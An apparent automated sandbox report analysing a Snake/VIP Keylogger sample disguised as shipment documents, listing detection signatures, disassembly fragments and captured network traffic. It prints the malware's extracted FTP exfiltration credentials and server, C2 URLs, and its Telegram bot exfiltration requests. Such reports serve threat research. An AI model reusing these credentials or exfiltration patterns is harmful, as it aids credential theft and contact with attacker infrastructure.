Windows Analysis Report
rShipmentDocuments.exe

Overview

General Information

Sample name: rShipmentDocuments.exe
Analysis ID: 1531471
MD5: ff8c4ab4ec18f05864879323f4a41050
SHA1: 6552329870d1a2627b5e9b6b6cfd3d2efea87735
SHA256: db4523c5fa05acf8d6c8d47c722a5c39a728078f94a7f6877faa0a6fb87afc33
Tags: exe, SnakeKeylogger, user-Porcupine

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "Soma@hulonqgroup.com", "Password": "TNwhAkO^1&lZ", "FTP Server": "ftp://185.230.141.85/", "Version": "4.4"}
Source: http://varders.kozow.com:8081 Virustotal: Detection: 14% Perma Link
Source: http://aborters.duckdns.org:8081 Virustotal: Detection: 13% Perma Link
Source: http://51.38.247.67:8081/_send_.php?L Virustotal: Detection: 7% Perma Link
Source: http://anotherarmy.dns.army:8081 Virustotal: Detection: 17% Perma Link
Source: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Virustotal: Detection: 37% Perma Link
Source: rShipmentDocuments.exe Virustotal: Detection: 37% Perma Link
Source: rShipmentDocuments.exe ReversingLabs: Detection: 28%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Joe Sandbox ML: detected
Source: rShipmentDocuments.exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: rShipmentDocuments.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: rShipmentDocuments.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 02A3F45Dh 9_2_02A3F2C0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 02A3F45Dh 9_2_02A3F4AC
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 02A3FC19h 9_2_02A3F961
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F31E8h 9_2_068F2DD0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FF661h 9_2_068FF3B8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F0D0Dh 9_2_068F0B30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F1697h 9_2_068F0B30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F2C21h 9_2_068F2970
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FE959h 9_2_068FE6B0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FE0A9h 9_2_068FDE00
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_068F0673
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FF209h 9_2_068FEF60
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FCF49h 9_2_068FCCA0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F31E8h 9_2_068F2DCA
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FD7F9h 9_2_068FD550
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FE501h 9_2_068FE258
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FEDB1h 9_2_068FEB08
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FD3A1h 9_2_068FD0F8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FFAB9h 9_2_068FF810
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_068F0040
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_068F0853
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FDC51h 9_2_068FD9A8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F31E8h 9_2_068F3116
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 069C9E1Dh 10_2_069CA0A0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 0303F45Dh 16_2_0303F2C0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 0303F45Dh 16_2_0303F4AC
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 0303FC19h 16_2_0303F961
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8F661h 16_2_06D8F3B8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D80D0Dh 16_2_06D80B30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D81697h 16_2_06D80B30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D831E0h 16_2_06D82DC8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D82C19h 16_2_06D82968
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8E959h 16_2_06D8E6B0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8E501h 16_2_06D8E258
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 16_2_06D80673
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8E0A9h 16_2_06D8DE00
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8F209h 16_2_06D8EF60
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8EDB1h 16_2_06D8EB08
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8D3A1h 16_2_06D8D0F8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8CF49h 16_2_06D8CCA0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 16_2_06D80853
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 16_2_06D80040
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8FAB9h 16_2_06D8F810
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D831E0h 16_2_06D82DC3
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8DC51h 16_2_06D8D9A8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8D7F9h 16_2_06D8D550
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D831E0h 16_2_06D8310E

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.4:49205 -> 185.230.141.85:49693
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: HostingvpsvilleruRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.96.3:443
Source: unknown FTP traffic detected: 185.230.141.85:21 -> 192.168.2.4:49204 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
